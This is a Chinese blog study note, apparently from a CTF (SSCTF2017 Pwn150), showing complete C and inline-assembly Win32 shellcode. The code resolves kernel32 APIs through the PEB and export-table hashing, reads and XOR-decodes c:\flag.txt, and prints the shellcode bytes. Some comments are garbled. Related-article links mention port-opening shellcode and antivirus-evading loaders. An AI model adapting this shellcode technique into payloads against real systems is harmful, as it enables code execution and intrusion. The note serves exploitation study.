【笔记】使用C语言编写win32平台Shellcode

最新推荐文章于 2023-12-06 19:42:29 发布
最新推荐文章于 2023-12-06 19:42:29 发布
阅读量555 收藏
点赞数
分类专栏: 学习笔记

转自:http://www.tuicool.com/articles/eMJfaea — Pwn150 Word2003部分

例子:

/*

void *get_kernel32_base()

{

__asm

{

push ebp

xor ecx,ecx

mov esi,fs:0x30 ;        //fs30PEB指针

mov esi, [esi + 0x0C];   //PEB偏移0x0C为PEB_LDR_DATA指针

mov esi, [esi + 0x1C];  //PEB_LDR_DATA偏移0x1C为模块初始化链表指针InInitializationOrderModuleList

next_module:   ;  //从第一个模块开始查找

mov ebp, [esi + 0x08];    //当前模块基地址

mov edi, [esi + 0x20];  //

mov esi, [esi];  //模块节点起址

cmp [edi + 12*2],cl  ;// modulename[12] == 0 即判断为kernel32 ???为什么?

jne next_module  ;//否则继续查找下一个模块

mov edi,ebp;BaseAddr of Kernel32.dll  

mov eax, edi ; //直至找到kernel32.dll,将其加载基址存入edi和eax(作为返回值)

pop ebp ;  //恢复ebp

}

}

*/

#include <stdio.h>

#include <windows.h>

void ShellcodeEntry();

#define KERNEL32_HASH 0x000d4e88

#define KERNEL32_LOADLIBRARYA_HASH 0x000d5786

#define KERNEL32_GETPROCADDRESSA_HASH 0x00348bfa

//---------------------

typedef HMODULE (WINAPI *pLoadLibraryA)(LPCTSTR lpFileName);

typedef FARPROC (WINAPI *pGetProcAddressA)(HMODULE hModule,LPCTSTR lpProcName);

//=---------------------

 

void  ShellCodeStart(void)

{

ShellcodeEntry();

}

void ResolvAddr(pLoadLibraryA *pfLoadLibraryA,pGetProcAddressA*pfGetProcAddressA)

{

pLoadLibraryA fLoadLibraryA;

pGetProcAddressA fGetProcAddressA;

//获?取¨?API函¡¥数ºy地Ì?址¡¤代䨲码?出?自Á?The Shellcoders Handbook一°?书º¨¦

//支¡ì持?win 2k/NT/xp/7其?它¨¹没?测a试º?

__asm

{

push KERNEL32_LOADLIBRARYA_HASH ;//压入所需查找函数的hash值作为参数

push KERNEL32_HASH; //压入该函数对应模块名的hash值

call ResolvFuncAddr

mov fLoadLibraryA, eax;  //得到LoadLibraryA函数地址

push KERNEL32_GETPROCADDRESSA_HASH

push KERNEL32_HASH

call ResolvFuncAddr

mov fGetProcAddressA, eax;  //得到GetProcAddressA函数地址

jmp totheend

ResolvFuncAddr:

push ebp

mov ebp, esp

push ebx ;  //将各原寄存器值先保存到栈中, 构造的ResolvFuncAddr函数执行完毕时从栈中进行恢复

push esi  ;

push edi

push ecx

push fs:[0x30]

pop eax

mov eax, [eax+0x0c]  ;//当前查找函数的hash值(没看懂怎么定位的)

mov ecx, [eax+0x0c]  ; //同上

next_module:

mov edx, [ecx]

mov eax, [ecx+0x30]  ;//模块名-

push 0x02

mov edi, [ebp+0x08]

push edi

push eax

call hashit  ;//计算模块名hash值

test eax, eax

jz foundmodule  ;//hash值相等即为所要找模块

mov ecx, edx

jmp next_module ;//否则继续循环查找

foundmodule:

mov eax, [ecx+0x18] ;//找到kernel32模块后,+08得到kernel32.dll在内存中基址

push eax  ;

mov ebx, [eax+0x3c] ;//kernel32.dll基址+3C得其PE头(相对起始地址?)

add eax, ebx

mov ebx, [eax+0x78];  //eax+ebx+78得函数导出表起始地址

pop eax

push eax

add ebx, eax

mov ecx, [ebx+28]

mov edx, [ebx+32]

mov ebx, [ebx+36]

add ecx, eax

add edx, eax

add ebx, eax

find_procedure:

mov esi, [edx]

pop eax

push eax

add esi, eax

push 1

push [ebp+12]

push esi

call hashit

test eax, eax

jz found_procedure

add edx, 4

add ebx, 2

jmp find_procedure

found_procedure:

pop eax

xor edx, edx

mov dx, [ebx]

shl edx, 2

add ecx, edx

add eax, [ecx]

pop ecx

pop edi

pop esi

pop ebx

mov esp, ebp

pop ebp

ret 0x08

hashit:  ;//用于计算hash值

push ebp

mov ebp, esp

push ecx

push ebx

push edx

xor ecx,ecx

xor ebx,ebx

xor edx,edx

mov eax, [ebp+0x08]

hashloop:

mov dl, [eax]

or dl, 0x60

add ebx, edx

shl ebx, 0x01

add eax, [ebp+16]

mov cl, [eax]

test cl, cl

loopnz hashloop

xor eax, eax

mov ecx, [ebp+12]

cmp ebx, ecx

jz donehash

inc eax

donehash:

pop edx    //恢复寄存器

pop ebx

pop ecx

mov esp, ebp

pop ebp

ret 12

totheend:

}

*pfLoadLibraryA = fLoadLibraryA;

*pfGetProcAddressA = fGetProcAddressA;

}

//===========================

 

//定义要用到的各函数的指针

typedef int (WINAPI *pMessageBoxA)(HWNDhWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType);

typedef FILE* (__cdecl *pfopen)(constchar * path,const char * mode);

typedef size_t (__cdecl * pfread)(void *buffer, size_t size, size_t count, FILE *stream);

typedef int (__cdecl * pfseek)(FILE*stream, long offset, int fromwhere);

typedef long int (__cdecl *pftell)(FILE * stream );

typedef int (__cdecl * pfclose)(FILE*stream);

typedef void* (__cdecl * pmalloc)(size_tsize);

 

//-----------

void fmemset(void *dest, char ch, int size)

{

int i;

for (i = 0; i < size; i++)

{

((char *)dest)[i] = ch;

}

}

//--------------

 

void ShellcodeEntry()

{

pLoadLibraryA fLoadLibraryA;

pGetProcAddressA fGetProcAddressA;

ResolvAddr(&(fLoadLibraryA), &(fGetProcAddressA));

 

//----------下为定义各写shellcode要用到的函数及其所在dll的十六进制ASCII码(以便通过上面找到的fLoadLibraryA和fGetProcAddressA直接找到所需函数)----------

int val_User32_dll[3];   // “User32_dll”的十六进制ASCII码

val_User32_dll[0] = 0x72657355;

val_User32_dll[1] = 0x642e3233;

val_User32_dll[2] = 0x6c6c;

int val_MessageBoxA[3];  // “MessageBoxA”的十六进制ASCII码

val_MessageBoxA[0] = 0x7373654d;

val_MessageBoxA[1] = 0x42656761;

val_MessageBoxA[2] = 0x41786f;

int val_msvcrt_dll[3];   // “msvcrt_dll”的十六进制ASCII码

val_msvcrt_dll[0] = 0x6376736d;

val_msvcrt_dll[1] = 0x642e7472;

val_msvcrt_dll[2] = 0x6c6c;

int val_fopen[2];

val_fopen[0] = 0x65706f66;

val_fopen[1] = 0x6e;

int val_fread[2];

val_fread[0] = 0x61657266;

val_fread[1] = 0x64;

int val_fseek[2];

val_fseek[0] = 0x65657366;

val_fseek[1] = 0x6b;

int val_ftell[2];

val_ftell[0] = 0x6c657466;

val_ftell[1] = 0x6c;

int val_fclose[2];

val_fclose[0] = 0x6f6c6366;

val_fclose[1] = 0x6573;

int val_malloc[2];  //malloc函数名的十六进制ASCII码

val_malloc[0] = 0x6c6c616d;

val_malloc[1] = 0x636f;

int val_SSCTF2017[3] ; // SSCTF2017的十六进制ASCII码

val_SSCTF2017[0] = 0x54435353;

val_SSCTF2017[1] = 0x31303246;

val_SSCTF2017[2] = 0x37;

int val_c_flag_txt[3]; //c:flag.txt的十六进制ASCII码

val_c_flag_txt[0] = 0x665c3a63;

val_c_flag_txt[1] = 0x2e67616c;

val_c_flag_txt[2] = 0x747874;

//-------------------------------------

 

 

int val_rb[1];

val_rb[0] = 0x6272;

 

HMODULE User32;

pMessageBoxA fMessageBoxA;

User32 = fLoadLibraryA((char *)val_User32_dll);

fMessageBoxA = (pMessageBoxA)fGetProcAddressA(User32, (char*)val_MessageBoxA);

HMODULE Msvcrt;

long int fz;

pfopen ffopen;

pfread ffread;

pfseek ffseek;

pftell fftell;

pfclose ffclose;

pmalloc fmalloc;

Msvcrt = fLoadLibraryA((char *)val_msvcrt_dll);

ffopen = (pfopen)fGetProcAddressA(Msvcrt,(char *)val_fopen);

ffread = (pfread)fGetProcAddressA(Msvcrt, (char *)val_fread);

ffseek = (pfseek)fGetProcAddressA(Msvcrt,(char *)val_fseek);

fftell = (pftell)fGetProcAddressA(Msvcrt, (char *)val_ftell);

ffclose = (pfclose)fGetProcAddressA(Msvcrt, (char *)val_fclose);

fmalloc = (pmalloc)fGetProcAddressA(Msvcrt, (char *)val_malloc);

char* Title = (char *)val_SSCTF2017;

char* filename = (char *)val_c_flag_txt;

char *mode = (char *)val_rb;

char *buff;

FILE *fp = ffopen(filename, mode);

ffseek(fp, 0, SEEK_END);

fz = fftell(fp);

ffseek(fp, 0, SEEK_SET);

buff = (char *)fmalloc(fz + 1);

ffread(buff, 1, fz, fp);

ffclose(fp);

int i;

for (i = 0; i < fz; i++)

{

buff[i] ^= 0xcc;  //取异或

}

buff[fz] = 0;

fMessageBoxA(NULL,buff,Title,MB_OK);

//getchar();

}

void  ShellCodeEnd(void)

{

__asm

{

nop

nop

nop

}

}

void main()

{

unsigned char *p_ptr = (unsigned char *)ShellCodeStart;

unsigned char *p_end = (unsigned char *)ShellCodeEnd;

printf("size:%d\n", p_end - p_ptr);

while (p_ptr < p_end)

{

printf("%02x", *p_ptr); //打印出shellcode的十六进制形式

p_ptr++;

}

ShellCodeStart();

}



LemonLENG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
win32shellcode
06-26
win32shellcode
使用C语言编写通用shellcode的程序
TYJJXSJ的专栏
01-29 2115
/*   使用C语言编写通用shellcode的程序   出处:internet   修改:Hume/冷雨飘心   测试:Win2K SP4 Local   */    #include    #include    #include    #define  DEBUG 1    //    //函数原型    //    void    
1.8 运用C编写ShellCode代码
CSDN
08-30 5442
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
C/C++ 实现ShellCode编写与提取
CSDN
07-16 7962
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码在转换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在转换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
c语言 sysinfo_【干货分享】手把手简易实现shellcode及详解
weixin_36463292的博客
02-23 364
阅读:38,301漏洞利用中必不可缺的部分就是shellcodeshellcode是用来发送到服务器利用特定漏洞的代码,它能在极小的空间内完成一些基本而重要的工作。下面跟着我一步一步学习shellcode编写和验证吧!学而不知道,与不学同;知而不能行,与不知同。 ——黄睎1简介漏洞利用中必不可缺的部分就是shellcodeshellcode能在极小的空间内完成一些基本而重要的工作。Shell...
无dll插入进程,下载者vc源代码
u010488395的专栏
05-06 667
无dll插入进程,下载者vc源代码 增加代码xor解密功能,以逃过杀毒软件. 生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可. 参考delphi版本的下载者源代码,编出来有16k左右。压缩也有10k多, 于是写了vc的代码。按以下的设置,编译出来2k左右。 还可以可以再设置一下编译开关,以减小体积。 ps:原代码中4处没有对\转义,以下代码编译通过; 编译
C/C++ 通用ShellCode编写与调用
CSDN
09-23 6034
首先,我们的ShellCode代码需要自定位,因为我们的代码并不是一个完整的EXE可执行程序,他没有导入表无法定位到当前系统中每个函数的虚拟地址,所以我们直接获取到Kernel32.dll的基地址,里面的GetProcAddr这个函数,获取的方式有很多,第一种是暴力搜索,第二种通过遍历进程的TEB结构来实现,我们使用第二种方式尝试,一旦获取到该函数,就可以动态的调用任何想要的函数了。
C语言实现shellcode通用框架二:文件下载执行或内存加载
yan_star的博客
01-21 1104
简介: 承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使
探索C语言中的Shellcode从提取到执行
CSDN
12-06 4186
Shellcode是一种独立于应用程序的机器代码,通常用于实现特定任务,如执行远程命令、注入恶意软件或利用系统漏洞。在网络安全领域,研究Shellcode是理解恶意软件和提高系统安全性的关键一环。本文将深入探讨如何在C语言中提取Shellcode,并通过XOR加密技术增加其混淆程度。最后,我们将演示如何将Shellcode写入文件并在内存中执行。
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
NimShellCodeLoader:使用nim编写shellcode加载器
02-03
Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其中两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:...
Study_shellcode:windows平台下功能性shellcode编写
04-29
windows平台下功能性shellcode编写 包含了5个类型的test例子,不知道从哪里下载的。 例子可能比较老,在win7,win10上可能无法成功执行,新系统的安全性比较高,最佳的环境是在XP。 补充以下不错的入门教程 ...
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
利用 PEB 结构来查找 kernel32.dll 的原理:FS 段寄存器作为选择子指向当前的 TEB 结构,在位于 PEB_LDR_DATA 结构偏移 0x1
Win32 Shellcode.7z
05-20
Win32 Shellcode.7z Win32 Shellcode.7z
关于__Federico Milano 的电力系统分析工具箱.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
mlab-upenn 研究小组的心脏模型模拟.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
混合图像创建大师matlab代码.zip
最新发布
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
中序遍历二叉树-java版本
04-26
在Java中,实现二叉树的中序遍历同样可以通过递归来完成。中序遍历的顺序是:首先递归地中序遍历左子树,然后访问根节点,最后递归地中序遍历右子树。 在这段代码中,Node类定义了二叉树的节点,BinaryTree类包含一个指向根节点的指针和inOrder方法,用于递归地进行中序遍历。printInOrder方法调用inOrder方法并打印出遍历的结果。 在Main类中,我们创建了一个示例二叉树,并调用printInOrder方法来输出中序遍历的结果。输出应该是:4 2 5 1 3,这表示中序遍历的顺序是左子树(4),然后是根节点(2),接着是右子树的左子树(5),然后是右子树的根节点(1),最后是右子树的右子树(3)。
使用shellcode编写printf("abc")
05-20
下面是一个使用shellcode编写printf("abc")的示例代码: ```assembly section .data msg db "abc",0x0a,0x00 ; 存储输出字符串 section .text global _start _start: ; 调用printf函数输出字符串 ; 将字符串地址压入栈中 push dword msg ; 调用printf函数 call printf ; 退出程序 xor eax, eax mov ebx, 0x01 int 0x80 ``` 在这个示例中,我们首先定义了一个字符串“abc”,并将其存储在.data节中。然后,在.text节中,我们使用汇编语言编写了一个_start函数。在_start函数中,我们将字符串地址压入栈中,然后调用printf函数以输出字符串。最后,我们使用xor eax, eax; mov ebx, 0x01; int 0x80来退出程序。 需要注意的是,这个示例中使用的是x86架构的汇编语言,如果你想使用其他架构的汇编语言,可能需要针对不同的架构进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值